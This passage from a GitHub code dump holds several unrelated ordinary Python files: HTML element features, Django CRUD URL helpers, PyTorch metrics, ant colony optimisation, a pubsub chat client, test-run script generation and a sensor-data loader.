self._number_of_children is not None:\n return self._number_of_children\n self._number_of_children = len(list(self.children))\n return self._number_of_children\n \n @property\n def number_of_siblings(self):\n \"\"\"\n get number of siblings\n :return:\n \"\"\"\n if self._number_of_siblings is not None:\n return self._number_of_siblings\n self._number_of_siblings = len(list(self.siblings))\n return self._number_of_siblings\n \n @property\n def number_of_descendants(self):\n \"\"\"\n get number of descendants\n :return:\n \"\"\"\n if self._number_of_descendants is not None:\n return self._number_of_descendants\n from gerapy_auto_extractor.utils.element import number_of_descendants\n self._number_of_descendants = len(list(self.descendants))\n return self._number_of_descendants\n \n @property\n def density_of_punctuation(self):\n \"\"\"\n get density of punctuation\n :return:\n \"\"\"\n if self._density_of_punctuation is not None:\n return self._density_of_punctuation\n from gerapy_auto_extractor.utils.element import density_of_punctuation\n self._density_of_punctuation = density_of_punctuation(self)\n return self._density_of_punctuation\n \n @property\n def density_of_text(self):\n \"\"\"\n get density of text\n :return:\n \"\"\"\n if self._density_of_text is not None:\n return self._density_of_text\n from gerapy_auto_extractor.utils.element import density_of_text\n self._density_of_text = density_of_text(self)\n return self._density_of_text\n \n @property\n def similarity_with_siblings(self):\n \"\"\"\n get similarity with siblings\n :return:\n \"\"\"\n if self._similarity_with_siblings is not None:\n return self._similarity_with_siblings\n from gerapy_auto_extractor.utils.element import similarity_with_siblings\n self._similarity_with_siblings = similarity_with_siblings(self)\n return self._similarity_with_siblings\n \n @property\n def a_descendants(self):\n \"\"\"\n get linked descendants\n :return:\n \"\"\"\n if self._a_descendants is not None:\n return self._a_descendants\n from gerapy_auto_extractor.utils.element import a_descendants\n self._a_descendants = a_descendants(self)\n return self._a_descendants\n \n @property\n def a_descendants_group(self):\n \"\"\"\n get linked descendants group\n :return:\n \"\"\"\n if self._a_descendants_group is not None:\n return self._a_descendants_group\n from gerapy_auto_extractor.utils.element import a_descendants_group\n self._a_descendants_group = a_descendants_group(self)\n return self._a_descendants_group\n \n @property\n def a_descendants_group_text_length(self):\n \"\"\"\n grouped linked text length\n :return:\n \"\"\"\n if self._a_descendants_group_text_length is not None:\n return self._a_descendants_group_text_length\n result = {}\n from gerapy_auto_extractor.utils.element import text\n for path, elements in self.a_descendants_group.items():\n lengths = []\n for element in elements:\n # TODO: convert len(text(element)) to element.number_of_char\n lengths.append(len(text(element)))\n mean_length = mean(lengths) if len(lengths) else 0\n result[path] = mean_length\n return result\n \n @property\n def a_descendants_group_text_min_length(self):\n \"\"\"\n get grouped linked text min length\n :return:\n \"\"\"\n if self._a_descendants_group_text_min_length is not None:\n return self._a_descendants_group_text_min_length\n values = self.a_descendants_group_text_length.values()\n self._a_descendants_group_text_min_length = min(values) if values else 0\n return self._a_descendants_group_text_min_length\n \n @property\n def a_descendants_group_text_max_length(self):\n \"\"\"\n get grouped linked text max length\n :return:\n \"\"\"\n if self._a_descendants_group_text_max_length is not None:\n return self._a_descendants_group_text_max_length\n values = self.a_descendants_group_text_length.values()\n self._a_descendants_group_text_max_length = max(values) if values else 0\n return self._a_descendants_group_text_max_length\n \n @property\n def a_descendants_group_text_avg_length(self):\n \"\"\"\n get grouped linked text avg length\n :return:\n \"\"\"\n if self._a_descendants_group_text_max_length is not None:\n return self._a_descendants_group_text_max_length\n values = self.a_descendants_group_text_length.values()\n self._a_descendants_group_text_max_length = max(values) if values else 0\n return self._a_descendants_group_text_max_length\n \n def __str__(self):\n \"\"\"\n rewrite str\n :return:\n \"\"\"\n return f'<Element {self.tag} of {self.path}>'\n \n def __repr__(self):\n \"\"\"\n rewrite repr\n :return:\n \"\"\"\n return self.__str__()\n","repo_name":"Gerapy/GerapyAutoExtractor","sub_path":"gerapy_auto_extractor/schemas/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":12594,"program_lang":"python","lang":"en","doc_type":"code","stars":282,"dataset":"github-code","pt":"48"} +{"seq_id":"72708643665","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf.urls import url\nfrom django.apps import apps\nfrom django.contrib.auth.decorators import login_required, permission_required\n\nfrom . import utils\nfrom .views import (\n CRUDCreateView,\n CRUDDeleteView,\n CRUDDetailView,\n CRUDListView,\n CRUDUpdateView,\n)\n\n\nclass CrudsUrlValidatorException(Exception):\n def __init__(self, message, errors):\n super(CrudsUrlValidatorException, self).__init__(message)\n self.errors = errors\n\n\ndef create_url_view(view=None, login_reqd=False, permission_reqd=None,\n login_url=None):\n if view == None:\n raise CrudsUrlValidatorException(u\"CRUDS URL VALIDATOR ERROR: \\\n View Required \\\n \") \n if login_reqd:\n if permission_reqd != None:\n raise CrudsUrlValidatorException(u\"CRUDS URL VALIDATOR ERROR: \\\n Login Required and Permission Required cannot be both passed \\\n \")\n return login_required(view)\n else:\n if permission_reqd != None:\n if login_url == \"\" or login_url == None:\n raise CrudsUrlValidatorException(u\"CRUDS URL VALIDATOR \\\n ERROR: Permission Required requires login_url \\\n \")\n return permission_required(permission_reqd,\n login_url=login_url)(view)\n else:\n return view\n\ndef crud_urls(model,\n list_view=None,\n create_view=None,\n update_view=None,\n detail_view=None,\n delete_view=None,\n url_prefix=None,\n name_prefix=None,\n list_views=None,\n login_reqd=False,\n permission_reqd=None,\n login_url='login',\n **kwargs):\n \"\"\"Returns a list of url patterns for model.\n\n :param list_view:\n :param create_view:\n :param update_view:\n :param detail_view:\n :param delete_view:\n :param url_prefix: prefix to prepend, default is `'$'`\n :param name_prefix: prefix to prepend to name, default is empty string\n :param list_views(dict): additional list views\n :param **kwargs: additional detail views\n :returns: urls\n \"\"\"\n if url_prefix is None:\n url_prefix = r'^'\n urls = []\n if list_view:\n urls.append(url(\n url_prefix + '$',\n create_url_view(list_view, login_reqd, permission_reqd, login_url),\n name=utils.crud_url_name(model, utils.ACTION_LIST,\n name_prefix)\n ))\n if create_view:\n urls.append(url(\n url_prefix + r'new/$',\n create_url_view(create_view, login_reqd, permission_reqd,\n login_url),\n #create_view,\n name=utils.crud_url_name(model, utils.ACTION_CREATE, name_prefix)\n ))\n if detail_view:\n urls.append(url(\n url_prefix + r'(?P<pk>\\d+)/$',\n create_url_view(detail_view, login_reqd, permission_reqd,\n login_url),\n #detail_view,\n name=utils.crud_url_name(model, utils.ACTION_DETAIL, name_prefix)\n ))\n if update_view:\n urls.append(url(\n url_prefix + r'(?P<pk>\\d+)/edit/$',\n create_url_view(update_view, login_reqd, permission_reqd,\n login_url),\n #update_view,\n name=utils.crud_url_name(model, utils.ACTION_UPDATE, name_prefix)\n ))\n if delete_view:\n urls.append(url(\n url_prefix + r'(?P<pk>\\d+)/remove/$',\n create_url_view(delete_view, login_reqd, permission_reqd,\n login_url),\n #delete_view,\n name=utils.crud_url_name(model, utils.ACTION_DELETE, name_prefix)\n ))\n\n if list_views is not None:\n for name, view in list_views.items():\n urls.append(url(\n url_prefix + r'%s/$' % name,\n create_url_view(view, login_reqd, permission_reqd,\n login_url),\n #view,\n name=utils.crud_url_name(model, name, name_prefix)\n ))\n\n for name, view in kwargs.items():\n urls.append(url(\n url_prefix + r'(?P<pk>\\d+)/%s/$' % name,\n create_url_view(view, login_reqd, permission_reqd,\n login_url),\n #view,\n name=utils.crud_url_name(model, name, name_prefix)\n ))\n return urls\n\n\ndef crud_for_model(model, urlprefix=None, login_rqd=False, perm_rqd=None,\n login_url=None):\n \"\"\"Returns list of ``url`` items to CRUD a model.\n \"\"\"\n model_lower = model.__name__.lower()\n\n if urlprefix is None:\n urlprefix = ''\n urlprefix += model_lower + '/'\n\n urls = crud_urls(\n model,\n list_view=CRUDListView.as_view(model=model),\n create_view=CRUDCreateView.as_view(model=model),\n detail_view=CRUDDetailView.as_view(model=model),\n update_view=CRUDUpdateView.as_view(model=model),\n delete_view=CRUDDeleteView.as_view(model=model),\n url_prefix=urlprefix,\n login_reqd=login_rqd,\n permission_reqd=perm_rqd,\n login_url=login_url\n )\n return urls\n\n\ndef crud_for_app(app_label,\n urlprefix=None,\n login_required=False,\n permission_required=None,\n login_url=None):\n \"\"\"\n Returns list of ``url`` items to CRUD an app.\n \"\"\"\n if urlprefix is None:\n urlprefix = app_label + '/'\n app = apps.get_app_config(app_label)\n urls = []\n for model in app.get_models():\n urls += crud_for_model(model, urlprefix, login_required, \n permission_required, login_url)\n return urls\n\n","repo_name":"renzcoldsun/django-cruds","sub_path":"cruds/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"27532161860","text":"import torch\nimport torch.nn as nn\n\n\nclass EuclideanDistance(nn.Module):\n def __init__(self, reduction=\"mean\"):\n super().__init__()\n\n self.reduction = getattr(torch, reduction, lambda x: x)\n\n def forward(self, outputs, targets):\n \"\"\"\n Args:\n outputs (torch.tensor): Torch tensor with shape (bs, seq_len, N_art, 2, N_samples).\n targets (torch.tensor): Torch tensor with shape (bs, seq_len, N_art, 2, N_samples).\n \"\"\"\n x_outputs = outputs[..., 0, :].clone()\n y_outputs = outputs[..., 1, :].clone()\n\n x_targets = targets[..., 0, :].clone()\n y_targets = targets[..., 1, :].clone()\n\n dist = torch.sqrt((x_outputs - x_targets) ** 2 + (y_outputs - y_targets) ** 2)\n return self.reduction(dist)\n\n\nclass MeanP2CPDistance(nn.Module):\n def __init__(self, reduction=\"mean\"):\n super().__init__()\n self.reduction = getattr(torch, reduction, lambda x: x)\n\n def forward(self, u_, v_):\n \"\"\"\n Args:\n u_ (torch.tensor): Tensor of shape (*, N, 2)\n v_ (torch.tensor): Tensor of shape (*, M, 2)\n \"\"\"\n n = u_.shape[-2]\n m = v_.shape[-2]\n\n dist_matrix = torch.cdist(u_, v_)\n u2cp, _ = dist_matrix.min(axis=-1)\n v2cp, _ = dist_matrix.min(axis=-2)\n mean_p2cp = (torch.sum(u2cp, dim=-1) / n + torch.sum(v2cp, dim=-1) / m) / 2\n\n return self.reduction(mean_p2cp)\n","repo_name":"vribeiro1/artspeech","sub_path":"phoneme_to_articulation/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"10824822093","text":"from graph import Graph\nfrom aco import AntColonyOpt as ACO\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef eval_aco(aco, graph):\n '''\n checks how long an ant needs from a specific start point to the goal to compare the optimization process over time.\n :param aco:\n :param graph:\n :return:\n '''\n dists = []\n nodes = [(1,1), (5,9), (3,5), (9,9), (8,1)]\n for i in nodes:\n dists.append(aco.test(start=i, goal=graph.goal))\n return dists\n\n\nif __name__ == \"__main__\":\n\n # define algorithm parameters\n num_ants = 20\n evaporation_rate = 0.05\n initial_pheromone = 0.01\n num_iterations = 100\n alpha = 0.8\n beta = 0.6\n\n width = 10\n height = 10\n\n #characters = \"abcdefghijklmnopqrstuvwxyz123456789\"\n #grid = np.array([char for char in characters]).reshape((5, 7))\n\n # Initialize the test_dict with the connections within a grid\n test_dict = {}\n for i in range(0, width):\n for j in range(0, height):\n\n node = (i,j)\n test_dict[node] = []\n\n # 'connect' current node with the left, right, up, down neighbours\n if i >= 1:\n test_dict[node].append((i-1, j))\n if j >= 1:\n test_dict[node].append((i, j-1))\n if i < width-1:\n test_dict[node].append((i+1, j))\n if j < height-1:\n test_dict[node].append((i, j+1))\n\n goal = (3,3)\n test_graph = Graph(test_dict, goal=goal, pheromone_value=initial_pheromone)\n test_ACO = ACO(test_graph, evaporation_rate, alpha, beta)\n\n test_dists = []\n\n # start ant colony optimization\n for i in range(0, num_iterations):\n\n if i % 10 == 0:\n test_dists.append(eval_aco(test_ACO, test_graph))\n\n print(\"Iteration \", i)\n test_ACO.tmp = Graph(test_dict)\n #foodsources = [\"c\", \"l\", \"z\", \"5\"]\n\n # in each iteration, each ant is supposed to find the food source starting from a random position\n for _ in range(0, num_ants):\n start = random.choice(test_graph.get_nodes())\n test_ACO.create_path(start=start, foodsources=[], goal=goal)\n test_ACO.pheromone_update()\n\n # img = np.zeros(grid.shape).astype(np.float64)\n # for (i, j) in test_ACO.graph.get_pheromones().keys():\n # img[grid == j] += test_ACO.graph.get_pheromones()[(i, j)]\n #\n # plt.imshow(img, cmap='gray')\n # plt.show()\n\n final_pheromones = test_ACO.graph.get_pheromones()\n\n # visualize the process of the optimization process thorugh the length of the path for the same start and end points\n test_dists.append(eval_aco(test_ACO, test_graph))\n test_dists = np.asarray(test_dists)\n x_pts = range(len(test_dists))\n marker = ['r.', 'b.', 'g.', 'y.', 'm.']\n test_dists = np.swapaxes(test_dists, 0, 1)\n for i in range(5):\n plt.plot(x_pts, test_dists[i], marker[i])\n plt.grid()\n plt.show()\n\n #img = np.zeros(grid.shape).astype(np.float64)\n #for (i, j) in final_pheromones.keys():\n # img[grid == j] += final_pheromones[(i, j)]\n\n #plt.imshow(img, cmap='gray')\n #plt.show()\n\n\n\n\n","repo_name":"NatureInspiredAlgorithms-Group-B/Ant_Colony_Optimization","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10609829304","text":"#!/usr/bin/env python\nimport pubsub\nimport threading\n\n__author__ = 'David'\n\nsample = pubsub.PubSub(addr='addigy-dev.cis.fiu.edu', queue_name='david', username='david', password='guest', auto_delete=True, heartbeat_interval=60, organization='testcorp')\n\nMESSAGES_EXCHANGE = sample.get_messageexchange()\nPRESENCE_EXCHANGE = sample.get_presenceexchange()\n\n\ndef callback(channel, method_frame, header_frame, body):\n exchange = method_frame.exchange\n if exchange == PRESENCE_EXCHANGE:\n action = header_frame.headers['action']\n who = header_frame.headers['key']\n if action == 'bind':\n print('User %s entered the room.' % (who,))\n elif action == 'unbind':\n print('User %s left the room.' % (who,))\n elif exchange == MESSAGES_EXCHANGE:\n who = method_frame.routing_key\n print('%s: %s' % (who, body))\n\nstarted = False\n\n\ndef consume():\n sample.subscribe(callback, queue_name='david', no_ack=True)\n\nwhile True:\n if started is False:\n thread = threading.Thread(target=consume)\n thread.start()\n started = True\n\n message = input(\"\")\n\n if message == \"exit\":\n sample.disconnect()\n\n sample.publish(routing_key='david',\n body=message)\n\n\n","repo_name":"FIU-SCIS-Senior-Projects/Addigy4","sub_path":"Code/subpub/python/Clients/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20144937727","text":"import hashlib\nimport json\n\n\ndef sign(params,key):\n paramsdict = json.loads(params)\n #列表生成式,将原本参数生成key=value格式\n a = [\"\".join(i) for i in paramsdict.items() if i[1] and i[0]!= \"sign\"]\n print(a)\n\n #将参数名按照ASCII码从小到大排序\n strA = \"\".join(sorted(a))\n print(strA)\n\n #在strA基础上拼接key得到结果\n strsign = strA + key\n print(strsign)\n\n m = hashlib.md5()\n m.update(strsign.lower().encode('UTF-8'))\n\n sign = m.hexdigest()\n\n paramsdict['sign'] = sign\n print(paramsdict)\n\n paramsstr=json.dumps(paramsdict)\n print(paramsdict)\n return paramsdict\n\n\n\n\nif __name__=='__main__':\n key = \"1234567890\"\n params={\n \"useraname\":\"uusjsjjs\",\n \"password\":\"ahagyd5882\"\n }\n\n jsonparam = json.dumps(params)\n\n result = sign(params,key)\n\n print(result)\n","repo_name":"wing112358/moduletest","sub_path":"lib/paramToSign.py","file_name":"paramToSign.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14038912107","text":"import FWCore.ParameterSet.Config as cms\n\n\ntriangleCutMTTopAndMTBJet = cms.EDFilter(\n\t\"TriangleCutFilter\",\n\tsrc1 = cms.InputTag(\"MTTop\"),\n\tsrc2 = cms.InputTag(\"MTBJet\"),\n\tsrc1Coeff = cms.double(1),\n\tsrc2Coeff = cms.double(2),\n\ttriangleMinCut = cms.double(1000),\n\ttriangleMaxCut = cms.double(999999999)\n\t)\n\ntriangleCutMTTop125AndMTBJet = cms.EDFilter(\n\t\"TriangleCutFilter\",\n\tsrc1 = cms.InputTag(\"MTTop125\"),\n\tsrc2 = cms.InputTag(\"MT125BJet\"),\n\tsrc1Coeff = cms.double(1),\n\tsrc2Coeff = cms.double(2),\n\ttriangleMinCut = cms.double(1000),\n\ttriangleMaxCut = cms.double(999999999)\n\t)\n\ntriangleCutMTTop15AndMTBJet = cms.EDFilter(\n\t\"TriangleCutFilter\",\n\tsrc1 = cms.InputTag(\"MTTop15\"),\n\tsrc2 = cms.InputTag(\"MT15BJet\"),\n\tsrc1Coeff = cms.double(1),\n\tsrc2Coeff = cms.double(2),\n\ttriangleMinCut = cms.double(1000),\n\ttriangleMaxCut = cms.double(999999999)\n\t)\n\ntriangleCutMTTop2Pt120AndMTBJet = cms.EDFilter(\n\t\"TriangleCutFilter\",\n\tsrc1 = cms.InputTag(\"MTTop2Pt120\"),\n\tsrc2 = cms.InputTag(\"MT2Pt120BJet\"),\n\tsrc1Coeff = cms.double(1),\n\tsrc2Coeff = cms.double(2),\n\ttriangleMinCut = cms.double(1000),\n\ttriangleMaxCut = cms.double(999999999)\n\t)\n\ntriangleCutMTTop2Pt150AndMTBJet = cms.EDFilter(\n\t\"TriangleCutFilter\",\n\tsrc1 = cms.InputTag(\"MTTop2Pt150\"),\n\tsrc2 = cms.InputTag(\"MT2Pt150BJet\"),\n\tsrc1Coeff = cms.double(1),\n\tsrc2Coeff = cms.double(2),\n\ttriangleMinCut = cms.double(1000),\n\ttriangleMaxCut = cms.double(999999999)\n\t)\n","repo_name":"crsilk/UserCode","sub_path":"HEPTopTagger/StopAnalysis/EventFilters/python/TriangleCutFilter_MTTopAndMTBJet_cfi.py","file_name":"TriangleCutFilter_MTTopAndMTBJet_cfi.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39618130249","text":"import csv\n\nstudentsList = []\nstudentIn = {'nombre' : 'Juan', 'edad' : 19, 'cursos': ['Basic'] }\nstudentsList.append(studentIn)\nstudentIn = {'nombre' : 'Marcos', 'edad' : 20, 'cursos': ['Turbo C','Pascal'] }\nstudentsList.append(studentIn)\n\nfor student in studentsList:\n print(\"Nombre: \" + student[\"nombre\"])\n print(\"Edad: \" + str(student[\"edad\"]))\n print(\"Cursos: \")\n for curso in student[\"cursos\"]:\n print(\" \" + curso)\n\n\nwith open(\"outputFile.csv\", \"wb\") as f:\n w = csv.DictWriter(f, studentsList[0].keys())\n w.writeheader()\n for student in studentsList:\n w.writerow(student)\n\n","repo_name":"jpruiz84/ubicuas_unicauca","sub_path":"ejercicios/guia02a.py","file_name":"guia02a.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24246380805","text":"import numpy as np\nimport numpy as np\nimport pandas as pd\n\nfrom .model import ModelWrapper\nfrom .encoder import Encoder\nfrom backend.utils.load_yml import load_config\n\n\nclass PredictionPipeline(object):\n \"\"\"Controls the prediction process from creating embeds to generating the\n damage grades.\n\n Workflow:\n 1. Preprocess df for Encoder\n 2. Run Encoder and replace the df with new embeds\n 3. Preprocess df with embeds\n 4. Feed df converted to npy array to model\n 5. post process predictions\n \"\"\"\n\n def __init__(\n self,\n encoder_path: str,\n one_hot_cols: str,\n one_hot_geo_path: str,\n model_type: str,\n model_path: str = None,\n ) -> None:\n self.model: ModelWrapper = ModelWrapper(model_type, model_path)\n self.encoder: Encoder = Encoder(encoder_path, one_hot_cols, one_hot_geo_path)\n\n def predict(self, df: pd.DataFrame) -> np.ndarray:\n \"\"\"Runs the full prediction pipeline with a batch size of 1\"\"\"\n new_df: pd.DataFrame = self.encoder.replace_with_new_embeds(df, batch_size=1)\n data: np.ndarray = preprocess_embeds_df(new_df)\n if data.shape[1] != self.model.num_features():\n raise ValueError(\n f\"data not correct shape. Is {data.shape}, but should be \"\n + f\"{(data.shape[0], self.model.num_features())}\"\n )\n\n y_pred = self.model.predict(data, False)\n return y_pred\n\n\ndef preprocess_embeds_df(df: pd.DataFrame) -> np.ndarray:\n \"\"\"Assumes that df already contains the embeds. Processes the df and\n converts it to a numpy array to be used in self.predict.\n \"\"\"\n if \"building_id\" in df.columns:\n df = df.drop([\"building_id\"], axis=1)\n\n if \"Unnamed: 0\" in df.columns:\n df = df.drop([\"Unnamed: 0\"], axis=1)\n\n return np.array(df)\n\n\ndef initialize_pipeline(config_path: str, model_type: str) -> PredictionPipeline:\n \"\"\"Initializes a prediction pipeline\n\n Args:\n model_type: One of 'catboost' or 'lightgbm'\n \"\"\"\n if model_type.lower() == \"catboost\":\n key = \"prediction_cat\"\n elif model_type.lower() == \"lightgbm\":\n key = \"prediction_lgb\"\n cfg = load_config(config_path)[key]\n return PredictionPipeline(**cfg)\n","repo_name":"jchen42703/plagiarism-api","sub_path":"backend/backend/api/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30674907686","text":"import argparse\n\n'''\nGet the command line parameter and return them.\n参数列表:\n--inputs_dir 测试用例存放路径\n--inputs_type 测试用例类型(文件[file]或参数[args]类型)\n--true_root_dir 正确程序根目录\n--true_source_path 正确源代码路径\n--timeout 判断程序运行超时,并终止运行程序的阈值\n--version 代码版本\n'''\ndef parserCommad():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--inputs_dir', action='store',\n default='./test_data/inputs/',\n dest='inputs_dir',\n help='test cases dictionary.')\n\n parser.add_argument('--inputs_type', action='store',\n default=\"file\",\n dest='inputs_type',\n help=\"test cases type. [file] or [args]\")\n\n parser.add_argument('--true_root_dir', action='store',\n default=\"./test_data/true_root/\",\n dest='true_root_dir',\n help='True example root dictionary.')\n\n parser.add_argument('--true_source_path', action='store',\n default=\"./test_data/true_root/source/tot_info.c\",\n dest='true_source_path',\n help='True program path.')\n\n parser.add_argument('--timeout', action='store',\n dest='timeout',\n type=int,\n default=1,\n help=\"run time limit of every program.\")\n\n parser.add_argument('--version', action='version',\n version='%(prog)s 1.2')\n\n results = parser.parse_args()\n\n return results\n\n\ndef createRunTrueSourceScriptFileMode(true_root_dir, true_source_path, timeout, inputs_dir):\n f = open(\"./output/input_list.txt\", 'r')\n input_paths = f.read().split(\"\\n\")[:-1]\n f.close()\n\n f = open(true_root_dir + \"run.sh\", \"w\")\n f.writelines(\"mkdir \" + true_root_dir + \"outputs\\n\")\n\n gcc_command = 'gcc ' + true_source_path + ' -o ' + true_source_path + '.exe -lm\\n'\n f.writelines(gcc_command)\n\n for i in range(len(input_paths)):\n command = 'echo \">>>>>>>>running test ' + str(i + 1) + '\"\\n'\n f.writelines(command)\n command = \"timeout \" + str(timeout) + \" \" \\\n + true_source_path + \".exe < \" \\\n + inputs_dir + input_paths[i] + \" > \" \\\n + true_root_dir + \"outputs/\" + input_paths[i] + \".out\\n\"\n f.writelines(command)\n\n f.close()\n\n\n'''\n读取output下的inputs_list文件(测试用例文件名列表),从所有测试用例文件中读出内容,续到运行正确源代码的run.sh脚本中\n'''\ndef createRunTrueSourceScriptArgsMode(true_root_dir, true_source_path, timeout, inputs_dir):\n\n # 获取测试用例文件列表\n f = open(\"./output/input_list.txt\", 'r')\n input_paths = f.read().split(\"\\n\")[:-1]\n f.close()\n\n # 打开所有测试用例文件,读取文件内的参数\n list_input_args = []\n for i in range(len(input_paths)):\n f = open(inputs_dir + input_paths[i], 'r')\n input_args = f.read()\n list_input_args.append(input_args)\n f.close()\n\n # 生成运行正确源代码的run.sh脚本\n f = open(true_root_dir+\"run.sh\", \"w\")\n f.writelines(\"mkdir \" + true_root_dir + \"outputs\\n\")\n\n gcc_command = 'gcc '+ true_source_path +' -o '+ true_source_path +'.exe -lm\\n'\n f.writelines(gcc_command)\n\n for i in range(len(list_input_args)):\n command = 'echo \">>>>>>>>running test ' + str(i+1) + '\"\\n'\n f.writelines(command)\n command = \"timeout \" + str(timeout) + \" \" \\\n + true_source_path +\".exe \" \\\n + list_input_args[i] +\" > \"\\\n + true_root_dir + \"outputs/\" + input_paths[i]+\".out\\n\"\n f.writelines(command)\n\n f.close()\n\n\nif __name__ == \"__main__\":\n args = parserCommad()\n\n if args.inputs_type == \"file\": # 文件模式\n createRunTrueSourceScriptFileMode(args.true_root_dir, args.true_source_path, args.timeout, args.inputs_dir)\n elif args.inputs_type == \"args\": # 参数模式\n createRunTrueSourceScriptArgsMode(args.true_root_dir, args.true_source_path, args.timeout, args.inputs_dir)\n else: # inputs_type异常\n raise Exception(\"!!!!!!-----inputs_type参数输入异常-------\")\n","repo_name":"lucyVan/SGS","sub_path":"HMBFL/HMBFLtool/create_run_true_source_shell.py","file_name":"create_run_true_source_shell.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30708078081","text":"import numpy as np\nimport pandas as pd\nimport streamlit as st \nfrom scipy.spatial.transform import Rotation as R\nimport shutil\nimport os\nimport base64\n\n@st.cache(suppress_st_warning=True, show_spinner=False, allow_output_mutation=True)\ndef read_file(name_of_file):\n\n# ENG_L_CS_rotM = rotx(-15.18); % 100% OK \n# ENG_R_CS_rotM = rotx(+15.28); % 100% OK \n# ENG_RR_CS_rotM = rotz(-90); % 100% OK\n# FS_L_CS_rotM = rotz(0); % 100% OK --> corrected\n# FS_R_CS_rotM = rotz(180); % 100% OK\n# FS_L_SS_rotM = rotx(16.91)*rotx(-90)*rotz(90); % 100% OK \n# FS_R_SS_rotM = rotx(-20.3)*rotx(-90)*rotz(90); % 100% OK \n# RS_L_CS_rotM = rotz(0); % 100% OK\n# RS_R_CS_rotM = rotz(180); % 100% OK\n# RS_L_SS_rotM = [0 -1 0 ; -1 0 0 ; 0 0 -1]; % 100% OK\n# RS_R_SS_rotM = rotx(9.17)*rotx(-90)*rotz(90); % 100% OK \n# ENG_L_SS_rotM = roty(12.43)*rotz(15.18)*roty(90); % 100% OK \n# ENG_R_SS_rotM = roty(28.7)*rotx(-11.42)*rotz(-90); % 100% OK \n# ENG_RR_SS_rotM = rotz(0); % 100% OK\n\n rot_dict = {'ENG_L_CS':R.from_euler('x', -15.18, degrees=True).as_matrix(),\n 'ENG_R_CS':R.from_euler('x', 15.28, degrees=True).as_matrix(),\n 'ENG_RR_CS':R.from_euler('z', -90, degrees=True).as_matrix(),\n 'FS_L_CS':R.from_euler('z', 0, degrees=True).as_matrix(),\n 'FS_R_CS':R.from_euler('z', 180, degrees=True).as_matrix(),\n 'FS_L_SS':R.from_euler('zx', [90,-90+16.91], degrees=True).as_matrix(),\n 'FS_R_SS':R.from_euler('zx', [90,-90-20.3], degrees=True).as_matrix(),\n 'RS_L_CS':R.from_euler('z', 0, degrees=True).as_matrix(),\n 'RS_R_CS':R.from_euler('z', 180, degrees=True).as_matrix(),\n 'RS_L_SS':np.array([[0,-1,0],[-1, 0, 0],[0,0,-1]]),\n 'RS_R_SS':R.from_euler('zx', [90,-90+9.17], degrees=True).as_matrix(),\n 'ENG_L_SS':R.from_euler('yzy', [90,15.18,12.43], degrees=True).as_matrix(),\n 'ENG_R_SS':R.from_euler('zxy', [-90,-11.42,28.7], degrees=True).as_matrix(),\n 'ENG_RR_SS':R.from_euler('z', 0, degrees=True).as_matrix() \n }\n # FS_L_CS_X/Z and ENG_RR_SS_X/Z --> suspicious ones, possibly swapped\n df = pd.read_csv('../Data/'+name_of_file+'.csv',sep='\\t')\n df.dropna(axis=1,how='any',inplace=True) \n\n temp = df['FS_L_CS_X']\n df['FS_L_CS_X'] = df['FS_L_CS_Z']\n df['FS_L_CS_Z'] = temp\n\n temp = df['ENG_RR_SS_X']\n df['ENG_RR_SS_X'] = df['ENG_RR_SS_Z']\n df['ENG_RR_SS_Z'] = temp\n\n # for sensor_name in rot_dict.keys():\n # col_to_accum = []\n # for col in np.sort(df_all_new.columns[2:]): \n # if sensor_name in col:\n # col_to_accum.append(col)\n\n # df_all_new[col_to_accum] = (np.dot(rot_dict[sensor_name],(np.array(df_all_new[col_to_accum])).T)).T\n\n for sensor_name in rot_dict.keys():\n # if sensor_name in list(df.columns):\n col_to_accum = []\n for col in np.sort(df.columns[2:]): \n if sensor_name in col:\n col_to_accum.append(col)\n \n if col_to_accum:\n df[col_to_accum] = (np.dot(rot_dict[sensor_name],(np.array(df[col_to_accum])).T)).T \n\n for col in df.columns[2:]:\n col_mean = np.nanmean(df[col])\n if 'CS' in col:\n scaling_factor = 0.3\n else:\n if 'ENG' in col:\n scaling_factor = 0.02\n else:\n scaling_factor = 0.057\n \n df[col] = (df[col]-col_mean)/scaling_factor\n \n # tmpdirname_plots = 'csv_file'\n # tmpdirname_zip = 'archive_csv'\n # try:\n # shutil.rmtree(tmpdirname_plots)\n # shutil.rmtree(tmpdirname_zip)\n # except:\n # pass \n # os.makedirs(tmpdirname_plots,exist_ok=True) \n # os.makedirs(tmpdirname_zip,exist_ok=True) \n\n # df.to_csv(tmpdirname_plots + '/' + name_of_file + '.csv')\n # create_download_zip(tmpdirname_plots,tmpdirname_zip,name_of_file + '_csvfile')\n\n return df\n\ndef create_download_zip(zip_directory, zip_path, filename=\"foo.zip\"):\n \"\"\" \n zip_directory (str): path to directory you want to zip \n zip_path (str): where you want to save zip file\n filename (str): download filename for user who download this\n \"\"\"\n shutil.make_archive(os.path.join(zip_path,filename), 'zip', zip_directory)\n with open(os.path.join(zip_path,filename+'.zip'), 'rb') as f:\n bytes = f.read()\n b64 = base64.b64encode(bytes).decode()\n href = 